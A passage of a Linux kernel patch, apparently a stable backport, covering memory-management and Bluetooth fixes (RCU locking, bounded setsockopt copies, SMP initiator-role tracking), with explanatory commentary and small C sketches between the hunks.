+ #endif
+diff --git a/mm/util.c b/mm/util.c
+index ce3bb17c97b9d..aa4f8a45dd569 100644
+--- a/mm/util.c
++++ b/mm/util.c
+@@ -1119,10 +1119,8 @@ void mem_dump_obj(void *object)
+ {
+ 	const char *type;
+ 
+-	if (kmem_valid_obj(object)) {
+-		kmem_dump_obj(object);
++	if (kmem_dump_obj(object))
+ 		return;
+-	}
+ 
+ 	if (vmalloc_dump_obj(object))
+ 		return;
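
Taken together, the slab_common.c and util.c hunks fold kmem_valid_obj() into kmem_dump_obj(): the dump function now does its own validation (the same ZERO_SIZE_PTR and virt_addr_valid() checks, with the WARN splats dropped) and reports through its bool return whether it recognized the pointer, so mem_dump_obj() needs one call per allocator instead of a check-then-dump pair. The general shape, with hypothetical names:

/* a "maybe handle it" helper: validation is built in, success is the
 * return value, and unrecognized input declines quietly instead of WARNing
 */
static bool try_dump_foo(const void *p)
{
	if (!foo_owns_pointer(p))	/* hypothetical ownership test */
		return false;
	foo_print_details(p);		/* hypothetical reporting */
	return true;
}

void dump_any(const void *p)
{
	if (try_dump_foo(p))
		return;
	if (try_dump_bar(p))		/* hypothetical: next allocator in line */
		return;
	pr_info("unrecognized pointer %p\n", p);
}
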
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index c5e30b52844c8..a0b650f50faa3 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -2992,15 +2992,8 @@ vm_area_alloc_pages(gfp_t gfp, int nid,
+ 			page = alloc_pages(alloc_gfp, order);
+ 		else
+ 			page = alloc_pages_node(nid, alloc_gfp, order);
+-		if (unlikely(!page)) {
+-			if (!nofail)
+-				break;
+-
+-			/* fall back to the zero order allocations */
+-			alloc_gfp |= __GFP_NOFAIL;
+-			order = 0;
+-			continue;
+-		}
++		if (unlikely(!page))
++			break;
+ 
+ 		/*
+ 		 * Higher order allocations must be able to be treated as
+diff --git a/net/bluetooth/bnep/core.c b/net/bluetooth/bnep/core.c
+index 5a6a49885ab66..a660c428e2207 100644
+--- a/net/bluetooth/bnep/core.c
++++ b/net/bluetooth/bnep/core.c
+@@ -385,7 +385,8 @@ static int bnep_rx_frame(struct bnep_session *s, struct sk_buff *skb)
+ 
+ 	case BNEP_COMPRESSED_DST_ONLY:
+ 		__skb_put_data(nskb, skb_mac_header(skb), ETH_ALEN);
+-		__skb_put_data(nskb, s->eh.h_source, ETH_ALEN + 2);
++		__skb_put_data(nskb, s->eh.h_source, ETH_ALEN);
++		put_unaligned(s->eh.h_proto, (__be16 *)__skb_put(nskb, 2));
+ 		break;
+ 
+ 	case BNEP_GENERAL:
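
The bnep fix replaces one ETH_ALEN + 2 byte copy out of s->eh.h_source, which silently relied on h_proto sitting directly behind h_source inside struct ethhdr, with two explicit writes; the 2-byte protocol goes through put_unaligned() because it can land on an odd offset in the rebuilt header. The idiom, as a sketch:

#include <linux/etherdevice.h>
#include <linux/skbuff.h>
#include <asm/unaligned.h>

/* rebuild header fields one by one instead of assuming struct layout */
static void put_src_and_proto(struct sk_buff *nskb, const struct ethhdr *eh)
{
	__skb_put_data(nskb, eh->h_source, ETH_ALEN);
	put_unaligned(eh->h_proto, (__be16 *)__skb_put(nskb, 2));
}
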
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index bac5a369d2bef..858c454e35e67 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -293,6 +293,9 @@ static int configure_datapath_sync(struct hci_dev *hdev, struct bt_codec *codec)
+ 	__u8 vnd_len, *vnd_data = NULL;
+ 	struct hci_op_configure_data_path *cmd = NULL;
+ 
++	if (!codec->data_path || !hdev->get_codec_config_data)
++		return 0;
++
+ 	err = hdev->get_codec_config_data(hdev, ESCO_LINK, codec, &vnd_len,
+ 					  &vnd_data);
+ 	if (err < 0)
+@@ -338,9 +345,7 @@ static int hci_enhanced_setup_sync(struct hci_dev *hdev, void *data)
+ 
+ 	bt_dev_dbg(hdev, "hcon %p", conn);
+ 
+-	/* for offload use case, codec needs to configured before opening SCO */
+-	if (conn->codec.data_path)
+-		configure_datapath_sync(hdev, &conn->codec);
++	configure_datapath_sync(hdev, &conn->codec);
+ 
+ 	conn->state = BT_CONNECT;
+ 	conn->out = true;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 398a324657697..210e03a3609d4 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -3419,7 +3419,12 @@ static void hci_link_tx_to(struct hci_dev *hdev, __u8 type)
+ 		if (c->type == type && c->sent) {
+ 			bt_dev_err(hdev, "killing stalled connection %pMR",
+ 				   &c->dst);
++			/* hci_disconnect might sleep, so, we have to release
++			 * the RCU read lock before calling it.
++			 */
++			rcu_read_unlock();
+ 			hci_disconnect(c, HCI_ERROR_REMOTE_USER_TERM);
++			rcu_read_lock();
+ 		}
+ 	}
+ 
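
hci_link_tx_to() walks the connection list under rcu_read_lock(), but hci_disconnect() may sleep, and sleeping is forbidden inside an RCU read-side critical section. The hunk applies the standard workaround: leave the RCU section around the sleeping call and re-enter it to continue, which is tolerable here because list_for_each_entry_rcu() copes with concurrent removal and the walk does not need a stable snapshot. In outline:

struct hci_conn_hash *h = &hdev->conn_hash;
struct hci_conn *c;

rcu_read_lock();
list_for_each_entry_rcu(c, &h->list, list) {
	if (connection_stalled(c)) {		/* hypothetical predicate */
		rcu_read_unlock();		/* sleeping call ahead */
		hci_disconnect(c, HCI_ERROR_REMOTE_USER_TERM);
		rcu_read_lock();		/* resume the walk */
	}
}
rcu_read_unlock();
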
+@@ -3739,19 +3744,19 @@ static void hci_sched_le(struct hci_dev *hdev)
+ {
+ 	struct hci_chan *chan;
+ 	struct sk_buff *skb;
+-	int quote, cnt, tmp;
++	int quote, *cnt, tmp;
+ 
+ 	BT_DBG("%s", hdev->name);
+ 
+ 	if (!hci_conn_num(hdev, LE_LINK))
+ 		return;
+ 
+-	cnt = hdev->le_pkts ? hdev->le_cnt : hdev->acl_cnt;
++	cnt = hdev->le_pkts ? &hdev->le_cnt : &hdev->acl_cnt;
+ 
+-	__check_timeout(hdev, cnt, LE_LINK);
++	__check_timeout(hdev, *cnt, LE_LINK);
+ 
+-	tmp = cnt;
+-	while (cnt && (chan = hci_chan_sent(hdev, LE_LINK, &quote))) {
++	tmp = *cnt;
++	while (*cnt && (chan = hci_chan_sent(hdev, LE_LINK, &quote))) {
+ 		u32 priority = (skb_peek(&chan->data_q))->priority;
+ 		while (quote-- && (skb = skb_peek(&chan->data_q))) {
+ 			BT_DBG("chan %p skb %p len %d priority %u", chan, skb,
+@@ -3766,7 +3771,7 @@ static void hci_sched_le(struct hci_dev *hdev)
+ 			hci_send_frame(hdev, skb);
+ 			hdev->le_last_tx = jiffies;
+ 
+-			cnt--;
++			(*cnt)--;
+ 			chan->sent++;
+ 			chan->conn->sent++;
+ 
+@@ -3776,12 +3781,7 @@ static void hci_sched_le(struct hci_dev *hdev)
+ 		}
+ 	}
+ 
+-	if (hdev->le_pkts)
+-		hdev->le_cnt = cnt;
+-	else
+-		hdev->acl_cnt = cnt;
+-
+-	if (cnt != tmp)
++	if (*cnt != tmp)
+ 		hci_prio_recalculate(hdev, LE_LINK);
+ }
+ 
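
hci_sched_le() used to copy the shared packet budget (le_cnt or acl_cnt) into a local variable, decrement the copy, and assign it back at the end, so any update made to the real counter in the meantime (for instance by a completed-packets event) could be overwritten. Working through a pointer makes every decrement land on the shared field immediately and removes the copy-back entirely. The pattern, with hypothetical helpers:

static void consume_budget(struct hci_dev *hdev)
{
	int *cnt = hdev->le_pkts ? &hdev->le_cnt : &hdev->acl_cnt;

	while (*cnt && queue_has_frames(hdev)) {	/* hypothetical */
		send_one_frame(hdev);			/* hypothetical */
		(*cnt)--;	/* shared counter updated in place */
	}
}
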
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 76dac5a90aef0..5b8adfb36e207 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -3524,6 +3524,10 @@ static int pair_device(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		 * will be kept and this function does nothing.
+ 		 */
+ 		p = hci_conn_params_add(hdev, &cp->addr.bdaddr, addr_type);
++		if (!p) {
++			err = -EIO;
++			goto unlock;
++		}
+ 
+ 		if (p->auto_connect == HCI_AUTO_CONN_EXPLICIT)
+ 			p->auto_connect = HCI_AUTO_CONN_DISABLED;
+diff --git a/net/bluetooth/rfcomm/sock.c b/net/bluetooth/rfcomm/sock.c
+index b54e8a530f55a..29aa07e9db9d7 100644
+--- a/net/bluetooth/rfcomm/sock.c
++++ b/net/bluetooth/rfcomm/sock.c
+@@ -629,7 +629,7 @@ static int rfcomm_sock_setsockopt_old(struct socket *sock, int optname,
+ 
+ 	switch (optname) {
+ 	case RFCOMM_LM:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
++		if (bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen)) {
+ 			err = -EFAULT;
+ 			break;
+ 		}
+@@ -664,7 +664,6 @@ static int rfcomm_sock_setsockopt(struct socket *sock, int level, int optname,
+ 	struct sock *sk = sock->sk;
+ 	struct bt_security sec;
+ 	int err = 0;
+-	size_t len;
+ 	u32 opt;
+ 
+ 	BT_DBG("sk %p", sk);
+@@ -686,11 +685,9 @@ static int rfcomm_sock_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 		sec.level = BT_SECURITY_LOW;
+ 
+-		len = min_t(unsigned int, sizeof(sec), optlen);
+-		if (copy_from_sockptr(&sec, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&sec, sizeof(sec), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (sec.level > BT_SECURITY_HIGH) {
+ 			err = -EINVAL;
+@@ -706,10 +703,9 @@ static int rfcomm_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt)
+ 			set_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags);
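
Both RFCOMM hunks swap open-coded copy_from_sockptr() calls, which copied a fixed size regardless of what optlen the caller passed, for bt_copy_from_sockptr(), which rejects short user buffers up front; the BT_SECURITY case also drops its min_t() truncation, so a full struct bt_security is now required. The helper lives in include/net/bluetooth/bluetooth.h in the corresponding upstream series and is essentially:

static inline int bt_copy_from_sockptr(void *dst, size_t dst_size,
				       sockptr_t src, size_t src_size)
{
	if (dst_size > src_size)
		return -EINVAL;	/* user supplied fewer bytes than needed */

	return copy_from_sockptr(dst, src, dst_size);
}
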
+diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c
+index ecb005bce65ac..d444fa1bd9f97 100644
+--- a/net/bluetooth/smp.c
++++ b/net/bluetooth/smp.c
+@@ -913,7 +913,7 @@ static int tk_request(struct l2cap_conn *conn, u8 remote_oob, u8 auth,
+ 	 * Confirms and the responder Enters the passkey.
+ 	 */
+ 	if (smp->method == OVERLAP) {
+-		if (hcon->role == HCI_ROLE_MASTER)
++		if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 			smp->method = CFM_PASSKEY;
+ 		else
+ 			smp->method = REQ_PASSKEY;
+@@ -963,7 +963,7 @@ static u8 smp_confirm(struct smp_chan *smp)
+ 
+ 	smp_send_cmd(smp->conn, SMP_CMD_PAIRING_CONFIRM, sizeof(cp), &cp);
+ 
+-	if (conn->hcon->out)
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_CONFIRM);
+ 	else
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RANDOM);
+@@ -979,7 +979,8 @@ static u8 smp_random(struct smp_chan *smp)
+ 	int ret;
+ 
+ 	bt_dev_dbg(conn->hcon->hdev, "conn %p %s", conn,
+-		   conn->hcon->out ? "initiator" : "responder");
++		   test_bit(SMP_FLAG_INITIATOR, &smp->flags) ? "initiator" :
++		   "responder");
+ 
+ 	ret = smp_c1(smp->tk, smp->rrnd, smp->preq, smp->prsp,
+ 		     hcon->init_addr_type, &hcon->init_addr,
+@@ -993,7 +994,7 @@ static u8 smp_random(struct smp_chan *smp)
+ 		return SMP_CONFIRM_FAILED;
+ 	}
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		u8 stk[16];
+ 		__le64 rand = 0;
+ 		__le16 ediv = 0;
+@@ -1250,14 +1251,15 @@ static void smp_distribute_keys(struct smp_chan *smp)
+ 	rsp = (void *) &smp->prsp[1];
+ 
+ 	/* The responder sends its keys first */
+-	if (hcon->out && (smp->remote_key_dist & KEY_DIST_MASK)) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags) &&
++	    (smp->remote_key_dist & KEY_DIST_MASK)) {
+ 		smp_allow_key_dist(smp);
+ 		return;
+ 	}
+ 
+ 	req = (void *) &smp->preq[1];
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		keydist = &rsp->init_key_dist;
+ 		*keydist &= req->init_key_dist;
+ 	} else {
+@@ -1426,7 +1428,7 @@ static int sc_mackey_and_ltk(struct smp_chan *smp, u8 mackey[16], u8 ltk[16])
+ 	struct hci_conn *hcon = smp->conn->hcon;
+ 	u8 *na, *nb, a[7], b[7];
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		na   = smp->prnd;
+ 		nb   = smp->rrnd;
+ 	} else {
+@@ -1454,7 +1456,7 @@ static void sc_dhkey_check(struct smp_chan *smp)
+ 	a[6] = hcon->init_addr_type;
+ 	b[6] = hcon->resp_addr_type;
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		local_addr = a;
+ 		remote_addr = b;
+ 		memcpy(io_cap, &smp->preq[1], 3);
+@@ -1533,7 +1535,7 @@ static u8 sc_passkey_round(struct smp_chan *smp, u8 smp_op)
+ 		/* The round is only complete when the initiator
+ 		 * receives pairing random.
+ 		 */
+-		if (!hcon->out) {
++		if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 			smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM,
+ 				     sizeof(smp->prnd), smp->prnd);
+ 			if (smp->passkey_round == 20)
+@@ -1561,7 +1563,7 @@ static u8 sc_passkey_round(struct smp_chan *smp, u8 smp_op)
+ 
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RANDOM);
+ 
+-		if (hcon->out) {
++		if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 			smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM,
+ 				     sizeof(smp->prnd), smp->prnd);
+ 			return 0;
+@@ -1572,7 +1574,7 @@ static u8 sc_passkey_round(struct smp_chan *smp, u8 smp_op)
+ 	case SMP_CMD_PUBLIC_KEY:
+ 	default:
+ 		/* Initiating device starts the round */
+-		if (!hcon->out)
++		if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 			return 0;
+ 
+ 		bt_dev_dbg(hdev, "Starting passkey round %u",
+@@ -1617,7 +1619,7 @@ static int sc_user_reply(struct smp_chan *smp, u16 mgmt_op, __le32 passkey)
+ 	}
+ 
+ 	/* Initiator sends DHKey check first */
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		sc_dhkey_check(smp);
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_DHKEY_CHECK);
+ 	} else if (test_and_clear_bit(SMP_FLAG_DHKEY_PENDING, &smp->flags)) {
+@@ -1740,7 +1742,7 @@ static u8 smp_cmd_pairing_req(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	struct smp_cmd_pairing rsp, *req = (void *) skb->data;
+ 	struct l2cap_chan *chan = conn->smp;
+ 	struct hci_dev *hdev = conn->hcon->hdev;
+-	struct smp_chan *smp;
++	struct smp_chan *smp = chan->data;
+ 	u8 key_size, auth, sec_level;
+ 	int ret;
+ 
+@@ -1749,16 +1751,14 @@ static u8 smp_cmd_pairing_req(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (skb->len < sizeof(*req))
+ 		return SMP_INVALID_PARAMS;
+ 
+-	if (conn->hcon->role != HCI_ROLE_SLAVE)
++	if (smp && test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		return SMP_CMD_NOTSUPP;
+ 
+-	if (!chan->data)
++	if (!smp) {
+ 		smp = smp_chan_create(conn);
+-	else
+-		smp = chan->data;
+-
+-	if (!smp)
+-		return SMP_UNSPECIFIED;
++		if (!smp)
++			return SMP_UNSPECIFIED;
++	}
+ 
+ 	/* We didn't start the pairing, so match remote */
+ 	auth = req->auth_req & AUTH_REQ_MASK(hdev);
+@@ -1940,7 +1940,7 @@ static u8 smp_cmd_pairing_rsp(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (skb->len < sizeof(*rsp))
+ 		return SMP_INVALID_PARAMS;
+ 
+-	if (conn->hcon->role != HCI_ROLE_MASTER)
++	if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		return SMP_CMD_NOTSUPP;
+ 
+ 	skb_pull(skb, sizeof(*rsp));
+@@ -2035,7 +2035,7 @@ static u8 sc_check_confirm(struct smp_chan *smp)
+ 	if (smp->method == REQ_PASSKEY || smp->method == DSP_PASSKEY)
+ 		return sc_passkey_round(smp, SMP_CMD_PAIRING_CONFIRM);
+ 
+-	if (conn->hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM, sizeof(smp->prnd),
+ 			     smp->prnd);
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RANDOM);
+@@ -2057,7 +2057,7 @@ static int fixup_sc_false_positive(struct smp_chan *smp)
+ 	u8 auth;
+ 
+ 	/* The issue is only observed when we're in responder role */
+-	if (hcon->out)
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		return SMP_UNSPECIFIED;
+ 
+ 	if (hci_dev_test_flag(hdev, HCI_SC_ONLY)) {
+@@ -2093,7 +2093,8 @@ static u8 smp_cmd_pairing_confirm(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	struct hci_dev *hdev = hcon->hdev;
+ 
+ 	bt_dev_dbg(hdev, "conn %p %s", conn,
+-		   hcon->out ? "initiator" : "responder");
++		   test_bit(SMP_FLAG_INITIATOR, &smp->flags) ? "initiator" :
++		   "responder");
+ 
+ 	if (skb->len < sizeof(smp->pcnf))
+ 		return SMP_INVALID_PARAMS;
+@@ -2115,7 +2116,7 @@ static u8 smp_cmd_pairing_confirm(struct l2cap_conn *conn, struct sk_buff *skb)
+ 			return ret;
+ 	}
+ 
+-	if (conn->hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM, sizeof(smp->prnd),
+ 			     smp->prnd);
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RANDOM);
+@@ -2150,7 +2151,7 @@ static u8 smp_cmd_pairing_random(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (!test_bit(SMP_FLAG_SC, &smp->flags))
+ 		return smp_random(smp);
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		pkax = smp->local_pk;
+ 		pkbx = smp->remote_pk;
+ 		na   = smp->prnd;
+@@ -2163,7 +2164,7 @@ static u8 smp_cmd_pairing_random(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	}
+ 
+ 	if (smp->method == REQ_OOB) {
+-		if (!hcon->out)
++		if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 			smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM,
+ 				     sizeof(smp->prnd), smp->prnd);
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_DHKEY_CHECK);
+@@ -2174,7 +2175,7 @@ static u8 smp_cmd_pairing_random(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (smp->method == REQ_PASSKEY || smp->method == DSP_PASSKEY)
+ 		return sc_passkey_round(smp, SMP_CMD_PAIRING_RANDOM);
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		u8 cfm[16];
+ 
+ 		err = smp_f4(smp->tfm_cmac, smp->remote_pk, smp->local_pk,
+@@ -2215,7 +2216,7 @@ static u8 smp_cmd_pairing_random(struct l2cap_conn *conn, struct sk_buff *skb)
+ 		return SMP_UNSPECIFIED;
+ 
+ 	if (smp->method == REQ_OOB) {
+-		if (hcon->out) {
++		if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 			sc_dhkey_check(smp);
+ 			SMP_ALLOW_CMD(smp, SMP_CMD_DHKEY_CHECK);
+ 		}
+@@ -2289,10 +2290,27 @@ bool smp_sufficient_security(struct hci_conn *hcon, u8 sec_level,
+ 	return false;
+ }
+ 
++static void smp_send_pairing_req(struct smp_chan *smp, __u8 auth)
++{
++	struct smp_cmd_pairing cp;
++
++	if (smp->conn->hcon->type == ACL_LINK)
++		build_bredr_pairing_cmd(smp, &cp, NULL);
++	else
++		build_pairing_cmd(smp->conn, &cp, NULL, auth);
++
++	smp->preq[0] = SMP_CMD_PAIRING_REQ;
++	memcpy(&smp->preq[1], &cp, sizeof(cp));
++
++	smp_send_cmd(smp->conn, SMP_CMD_PAIRING_REQ, sizeof(cp), &cp);
++	SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RSP);
++
++	set_bit(SMP_FLAG_INITIATOR, &smp->flags);
++}
++
+ static u8 smp_cmd_security_req(struct l2cap_conn *conn, struct sk_buff *skb)
+ {
+ 	struct smp_cmd_security_req *rp = (void *) skb->data;
+-	struct smp_cmd_pairing cp;
+ 	struct hci_conn *hcon = conn->hcon;
+ 	struct hci_dev *hdev = hcon->hdev;
+ 	struct smp_chan *smp;
+@@ -2341,16 +2359,20 @@ static u8 smp_cmd_security_req(struct l2cap_conn *conn, struct sk_buff *skb)
+ 
+ 	skb_pull(skb, sizeof(*rp));
+ 
+-	memset(&cp, 0, sizeof(cp));
+-	build_pairing_cmd(conn, &cp, NULL, auth);
++	smp_send_pairing_req(smp, auth);
+ 
+-	smp->preq[0] = SMP_CMD_PAIRING_REQ;
+-	memcpy(&smp->preq[1], &cp, sizeof(cp));
++	return 0;
++}
+ 
+-	smp_send_cmd(conn, SMP_CMD_PAIRING_REQ, sizeof(cp), &cp);
+-	SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RSP);
++static void smp_send_security_req(struct smp_chan *smp, __u8 auth)
++{
++	struct smp_cmd_security_req cp;
+ 
+-	return 0;
++	cp.auth_req = auth;
++	smp_send_cmd(smp->conn, SMP_CMD_SECURITY_REQ, sizeof(cp), &cp);
++	SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_REQ);
++
++	clear_bit(SMP_FLAG_INITIATOR, &smp->flags);
+ }
+ 
+ int smp_conn_security(struct hci_conn *hcon, __u8 sec_level)
+@@ -2421,23 +2443,11 @@ int smp_conn_security(struct hci_conn *hcon, __u8 sec_level)
+ 			authreq |= SMP_AUTH_MITM;
+ 	}
+ 
+-	if (hcon->role == HCI_ROLE_MASTER) {
+-		struct smp_cmd_pairing cp;
+-
+-		build_pairing_cmd(conn, &cp, NULL, authreq);
+-		smp->preq[0] = SMP_CMD_PAIRING_REQ;
+-		memcpy(&smp->preq[1], &cp, sizeof(cp));
+-
+-		smp_send_cmd(conn, SMP_CMD_PAIRING_REQ, sizeof(cp), &cp);
+-		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RSP);
+-	} else {
+-		struct smp_cmd_security_req cp;
+-		cp.auth_req = authreq;
+-		smp_send_cmd(conn, SMP_CMD_SECURITY_REQ, sizeof(cp), &cp);
+-		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_REQ);
+-	}
++	if (hcon->role == HCI_ROLE_MASTER)
++		smp_send_pairing_req(smp, authreq);
++	else
++		smp_send_security_req(smp, authreq);
+ 
+-	set_bit(SMP_FLAG_INITIATOR, &smp->flags);
+ 	ret = 0;
+ 
+ unlock:
+@@ -2688,8 +2698,6 @@ static int smp_cmd_sign_info(struct l2cap_conn *conn, struct sk_buff *skb)
+ 
+ static u8 sc_select_method(struct smp_chan *smp)
+ {
+-	struct l2cap_conn *conn = smp->conn;
+-	struct hci_conn *hcon = conn->hcon;
+ 	struct smp_cmd_pairing *local, *remote;
+ 	u8 local_mitm, remote_mitm, local_io, remote_io, method;
+ 
+@@ -2702,7 +2710,7 @@ static u8 sc_select_method(struct smp_chan *smp)
+ 	 * the "struct smp_cmd_pairing" from them we need to skip the
+ 	 * first byte which contains the opcode.
+ 	 */
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		local = (void *) &smp->preq[1];
+ 		remote = (void *) &smp->prsp[1];
+ 	} else {
+@@ -2771,7 +2779,7 @@ static int smp_cmd_public_key(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	/* Non-initiating device sends its public key after receiving
+ 	 * the key from the initiating device.
+ 	 */
+-	if (!hcon->out) {
++	if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		err = sc_send_public_key(smp);
+ 		if (err)
+ 			return err;
+@@ -2833,7 +2841,7 @@ static int smp_cmd_public_key(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	}
+ 
+ 	if (smp->method == REQ_OOB) {
+-		if (hcon->out)
++		if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 			smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM,
+ 				     sizeof(smp->prnd), smp->prnd);
+ 
+@@ -2842,7 +2850,7 @@ static int smp_cmd_public_key(struct l2cap_conn *conn, struct sk_buff *skb)
+ 		return 0;
+ 	}
+ 
+-	if (hcon->out)
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_CONFIRM);
+ 
+ 	if (smp->method == REQ_PASSKEY) {
+@@ -2857,7 +2865,7 @@ static int smp_cmd_public_key(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	/* The Initiating device waits for the non-initiating device to
+ 	 * send the confirm value.
+ 	 */
+-	if (conn->hcon->out)
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		return 0;
+ 
+ 	err = smp_f4(smp->tfm_cmac, smp->local_pk, smp->remote_pk, smp->prnd,
+@@ -2891,7 +2899,7 @@ static int smp_cmd_dhkey_check(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	a[6] = hcon->init_addr_type;
+ 	b[6] = hcon->resp_addr_type;
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		local_addr = a;
+ 		remote_addr = b;
+ 		memcpy(io_cap, &smp->prsp[1], 3);
+@@ -2916,7 +2924,7 @@ static int smp_cmd_dhkey_check(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (crypto_memneq(check->e, e, 16))
+ 		return SMP_DHKEY_CHECK_FAILED;
+ 
+-	if (!hcon->out) {
++	if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		if (test_bit(SMP_FLAG_WAIT_USER, &smp->flags)) {
+ 			set_bit(SMP_FLAG_DHKEY_PENDING, &smp->flags);
+ 			return 0;
+@@ -2928,7 +2936,7 @@ static int smp_cmd_dhkey_check(struct l2cap_conn *conn, struct sk_buff *skb)
+ 
+ 	sc_add_ltk(smp);
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		hci_le_start_enc(hcon, 0, 0, smp->tk, smp->enc_key_size);
+ 		hcon->enc_key_size = smp->enc_key_size;
+ 	}
+@@ -3077,7 +3085,6 @@ static void bredr_pairing(struct l2cap_chan *chan)
+ 	struct l2cap_conn *conn = chan->conn;
+ 	struct hci_conn *hcon = conn->hcon;
+ 	struct hci_dev *hdev = hcon->hdev;
+-	struct smp_cmd_pairing req;
+ 	struct smp_chan *smp;
+ 
+ 	bt_dev_dbg(hdev, "chan %p", chan);
+@@ -3129,14 +3136,7 @@ static void bredr_pairing(struct l2cap_chan *chan)
+ 
+ 	bt_dev_dbg(hdev, "starting SMP over BR/EDR");
+ 
+-	/* Prepare and send the BR/EDR SMP Pairing Request */
+-	build_bredr_pairing_cmd(smp, &req, NULL);
+-
+-	smp->preq[0] = SMP_CMD_PAIRING_REQ;
+-	memcpy(&smp->preq[1], &req, sizeof(req));
+-
+-	smp_send_cmd(conn, SMP_CMD_PAIRING_REQ, sizeof(req), &req);
+-	SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RSP);
++	smp_send_pairing_req(smp, 0x00);
+ }
+ 
+ static void smp_resume_cb(struct l2cap_chan *chan)
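
Every smp.c hunk above follows one theme: the pairing role is recorded explicitly in SMP_FLAG_INITIATOR at the moment it is decided (set by smp_send_pairing_req(), cleared by smp_send_security_req()), and the later hcon->out / HCI_ROLE_MASTER tests switch to that flag, since who initiated the ACL connection is not necessarily who initiates pairing. Reduced to its core, the convention is:

/* write the flag exactly where the role is decided, read it everywhere else */
static bool smp_is_initiator(struct smp_chan *smp)
{
	return test_bit(SMP_FLAG_INITIATOR, &smp->flags);
}
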
